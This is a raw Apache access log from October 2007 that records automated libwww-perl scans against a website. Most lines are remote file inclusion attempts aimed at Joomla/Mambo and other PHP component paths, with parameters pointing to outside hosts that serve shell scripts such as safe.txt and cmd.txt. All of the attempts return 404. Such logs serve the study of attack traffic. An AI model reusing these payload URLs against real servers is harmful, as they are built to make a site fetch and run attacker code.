204.15.10.33 - - [14/Oct/2007:12:48:09 -0700] "GET //jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:48:11 -0700] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:48:11 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:48:11 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:48:12 -0700] "GET /logs/access_070917.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.105.208.186 - - [14/Oct/2007:12:48:17 -0700] "GET /logs/access.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.62.35.165 - - [14/Oct/2007:12:48:20 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.0.0.242 - - [14/Oct/2007:12:48:29 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.digitalcrocker.org/.1/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:48:32 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:48:32 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:48:33 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.122.130.65 - - [14/Oct/2007:12:48:34 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.105.208.186 - - [14/Oct/2007:12:48:42 -0700] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:48:50 -0700] "GET /logs/access_070917.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.62.35.165 - - [14/Oct/2007:12:49:14 -0700] "GET /logs/access_070730.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.108.60.242 - - [14/Oct/2007:12:49:44 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.57.99 - - [14/Oct/2007:12:49:51 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.57.99 - - [14/Oct/2007:12:49:52 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.57.99 - - [14/Oct/2007:12:49:52 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:49:56 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:49:56 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:49:56 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:50:03 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:50:10 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:50:30 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:50:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:50:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:50:51 -0700] "GET /logs/access.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [14/Oct/2007:12:50:52 -0700] "GET /index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:50:52 -0700] "GET /logs/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [14/Oct/2007:12:51:42 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [14/Oct/2007:12:51:42 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:51:45 -0700] "GET /logs/access.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:51:45 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:51:45 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:52:13 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:52:22 -0700] "GET /logs/access.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:52:23 -0700] "GET /index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [14/Oct/2007:12:52:23 -0700] "GET /logs/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:52:34 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:53:11 -0700] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
62.193.248.155 - - [14/Oct/2007:12:53:31 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:53:31 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:54:06 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.166.142 - - [14/Oct/2007:12:54:06 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.57.99 - - [14/Oct/2007:12:54:26 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:54:49 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.193.248.204 - - [14/Oct/2007:12:54:55 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [14/Oct/2007:12:54:56 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
169.207.64.5 - - [14/Oct/2007:12:55:02 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
81.169.162.102 - - [14/Oct/2007:12:55:37 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:55:46 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:55:47 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:55:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:12:55:52 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.162.102 - - [14/Oct/2007:12:55:53 -0700] "GET //jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:12:56:09 -0700] "GET /logs//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
68.180.250.101 - - [14/Oct/2007:12:56:10 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:56:17 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:56:19 -0700] "GET /logs/access_070903.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:12:56:25 -0700] "GET /logs/access_070625.log//extensions/moblog/moblog_lib.php?basedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:56:25 -0700] "GET /logs/access_070826.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:56:32 -0700] "GET /logs/access_070903.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:56:33 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:12:56:42 -0700] "GET /logs/access_070625.log//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:57:07 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:57:07 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:57:08 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [14/Oct/2007:12:57:23 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:57:25 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:57:25 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:57:25 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:12:57:37 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:12:57:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:12:57:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.39.41 - - [14/Oct/2007:12:58:17 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.39.41 - - [14/Oct/2007:12:58:17 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.39.41 - - [14/Oct/2007:12:58:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.39.41 - - [14/Oct/2007:12:58:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.96.218 - - [14/Oct/2007:12:58:38 -0700] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:58:50 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.15.10.33 - - [14/Oct/2007:12:58:51 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:58:51 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:58:52 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [14/Oct/2007:12:58:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:58:53 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:59:05 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:59:21 -0700] "GET /logs/access_071001.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:59:32 -0700] "GET /logs/access_070917.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:59:40 -0700] "GET /logs/access_071001.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:59:49 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:59:49 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:59:50 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:59:55 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:59:55 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:12:59:55 -0700] "GET /logs/access_070618.log//extensions/moblog/moblog_lib.php?basedir=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
211.62.35.165 - - [14/Oct/2007:12:59:56 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.126.183.5 - - [14/Oct/2007:13:00:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.fotoim.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.162.102 - - [14/Oct/2007:13:00:06 -0700] "GET /logs/access_070618.log//jce/jscripts/tiny_mce/popupImage.php??mosConfig_absolute_path=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:07 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:07 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:08 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:49 -0700] "GET /logs/access_070625.log/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:49 -0700] "GET /index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:13:00:50 -0700] "GET /logs/index.php?p=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:13:01:03 -0700] "GET /logs/access_070820.log//include.php?path[docroot]=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:13:01:09 -0700] "GET /logs/access_071001.log/cgi-bin//classes/adodbt/sql.php?classes_dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:13:01:09 -0700] "GET /cgi-bin//classes/adodbt/sql.php?classes_dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:13:01:09 -0700] "GET /logs/cgi-bin//classes/adodbt/sql.php?classes_dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
